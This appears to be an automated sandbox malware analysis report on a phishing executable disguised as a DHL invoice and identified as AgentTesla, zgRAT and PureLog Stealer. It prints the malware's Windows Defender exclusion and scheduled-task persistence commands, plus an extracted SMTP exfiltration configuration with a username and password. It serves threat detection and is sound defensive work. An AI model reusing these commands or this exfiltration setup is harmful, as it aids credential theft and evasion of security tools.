Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Delivery Invoice.exe

Overview

General Information

Sample name:DHL Delivery Invoice.exe
Analysis ID:1564050
MD5:9af85d4623cafa79192f542727a6e923
SHA1:3739dbeeec123626e43210a4daf52d07b2a4247e
SHA256:320bf0a79235fdbfd5d1adadcfc530e134d9cf3aa67bfb5c63dfddbc3bb3963f
Tags:DHLexeuser-abuse_ch
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL Delivery Invoice.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
    • powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7260 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL Delivery Invoice.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
    • DHL Delivery Invoice.exe (PID: 2032 cmdline: "C:\Users\user\Desktop\DHL Delivery Invoice.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
  • LIWBHGsz.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\LIWBHGsz.exe MD5: 9AF85D4623CAFA79192F542727A6E923)
    • schtasks.exe (PID: 7392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LIWBHGsz.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Roaming\LIWBHGsz.exe" MD5: 9AF85D4623CAFA79192F542727A6E923)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.DHL Delivery Invoice.exe.79a0000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.DHL Delivery Invoice.exe.4355848.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.DHL Delivery Invoice.exe.4335828.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 29 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ProcessId: 5820, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ProcessId: 5820, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, ParentImage: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, ParentProcessId: 2852, ParentProcessName: LIWBHGsz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp", ProcessId: 7392, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\DHL Delivery Invoice.exe, Initiated: true, ProcessId: 2032, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", ProcessId: 3720, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ProcessId: 5820, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Invoice.exe", ParentImage: C:\Users\user\Desktop\DHL Delivery Invoice.exe, ParentProcessId: 6724, ParentProcessName: DHL Delivery Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp", ProcessId: 3720, ProcessName: schtasks.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeReversingLabs: Detection: 52%
                      Multi AV Scanner detection for submitted file
                      Source: DHL Delivery Invoice.exeReversingLabs: Detection: 52%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DHL Delivery Invoice.exeJoe Sandbox ML: detected
                      Source: DHL Delivery Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: DHL Delivery Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 77.88.21.158:587
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 77.88.21.158:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: smtp.yandex.com
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289247854.0000000009561000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4277773414.0000000006AB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                      Source: LIWBHGsz.exe, 0000000E.00000002.4277374146.0000000006A87000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl(
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl0
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                      Source: LIWBHGsz.exe, 0000000E.00000002.4277513647.0000000006A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/roo-
                      Source: LIWBHGsz.exe, 0000000E.00000002.4277513647.0000000006A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/roo--
                      Source: LIWBHGsz.exe, 0000000E.00000002.4278117301.0000000006AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/rooN
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288788386.000000000951C000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003285000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278117301.0000000006AD4000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.0000000001330000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289247854.0000000009561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4280859164.000000000924C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289443671.000000000957D000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288331730.00000000094D5000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003285000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288977120.0000000009559000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.comD
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gls
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 